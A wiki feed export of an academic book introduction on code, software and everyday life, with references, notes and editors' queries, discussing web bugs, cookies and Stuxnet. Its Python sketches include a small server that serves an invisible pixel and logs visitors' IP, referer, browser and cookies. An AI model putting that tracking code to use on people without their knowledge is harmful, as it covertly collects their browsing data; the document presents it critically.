Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus, and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm is able to transfer itself without requiring any human action. It does this by exploiting a computer's file or information transport features, such as its networking setup, which allow it to travel from machine to machine unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of images accidentally photographed in the background of computers used by the president confirmed the importance of the cascade structure, centrifuge layout and enrichment process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
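&lt;br /&gt;
The filesystem 'archeology' Wolfram describes can be sketched in a few lines of Python (standard library only); the starting directory, here the user's home, and the cut-off of ten files are illustrative assumptions: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of the filesystem 'archeology' Wolfram describes:
# rank files by last-modification time to surface the oldest ones.
# The starting directory and the cut-off are illustrative assumptions.
import os, time

ages = []
for root, dirs, files in os.walk(os.path.expanduser('~')):
    for name in files:
        path = os.path.join(root, name)
        try:
            ages.append((os.path.getmtime(path), path))
        except OSError:
            pass                      # unreadable or vanished file

# the ten files untouched for the longest time
for mtime, path in sorted(ages)[:10]:
    print(time.strftime('%Y-%m-%d', time.localtime(mtime)), path)
&amp;lt;/pre&amp;gt;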
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants: I draw the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software would be committed to the ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4710</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4710"/>
		<updated>2012-04-18T14:38:27Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how more softwarized simulacra lie just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour, leaving tracking information about browsing, purchasing and clicking through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
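&lt;br /&gt;
To make this mechanism concrete, the following minimal sketch, in Python and using only the standard library, shows how a server sets and later reads back a cookie in order to maintain 'state' across otherwise stateless HTTP requests. The cookie name 'uid' and its one-year lifetime are illustrative assumptions, not taken from any particular tracker: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of HTTP 'state management' with cookies
# (Python standard library). The cookie name 'uid' and its
# lifetime are illustrative assumptions only.
from http.cookies import SimpleCookie
import uuid

# First response: the server asks the browser to store a cookie.
cookie = SimpleCookie()
cookie['uid'] = uuid.uuid4().hex               # a pseudonymous identifier
cookie['uid']['path'] = '/'
cookie['uid']['max-age'] = 60 * 60 * 24 * 365  # persist for a year
print(cookie.output())                         # the Set-Cookie header line

# Every later request: the browser returns the cookie in its Cookie
# header, which the server parses to recover the stored 'state'.
incoming = SimpleCookie()
incoming.load('uid=' + cookie['uid'].value)
print('returning visitor:', incoming['uid'].value)
&amp;lt;/pre&amp;gt;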
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies some general information on this web bug: it has been found on over 100,000 websites across the Internet; the data collected is 'anonymous (browser type), pseudonymous (IP address)'; and the data is not shared with third parties, though no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
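&lt;br /&gt;
What such a tracker sees can also be sketched from the server's side. The following hypothetical Python fragment (standard library only; the port number and the choice of logged fields are assumptions for illustration) serves the invisible 1x1 GIF and logs what every request for it discloses: the visitor's IP address, the page being read (the Referer header), the browser in use, and any identifying cookie previously set: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A hypothetical sketch of the server side of a web bug: each request
# for the invisible 1x1 image hands the tracker the visitor's IP,
# the page they were reading, their browser and any identifying cookie.
from http.server import BaseHTTPRequestHandler, HTTPServer

PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff'
         b'!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01'
         b'\x00\x00\x02\x02D\x01\x00;')        # a 1x1 transparent GIF

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The 'payload' of the request is its metadata, not its body.
        print(self.client_address[0],
              self.headers.get('Referer'),
              self.headers.get('User-Agent'),
              self.headers.get('Cookie'))
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        self.end_headers()
        self.wfile.write(PIXEL)

HTTPServer(('', 8080), PixelHandler).serve_forever()
&amp;lt;/pre&amp;gt;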
&lt;br /&gt;
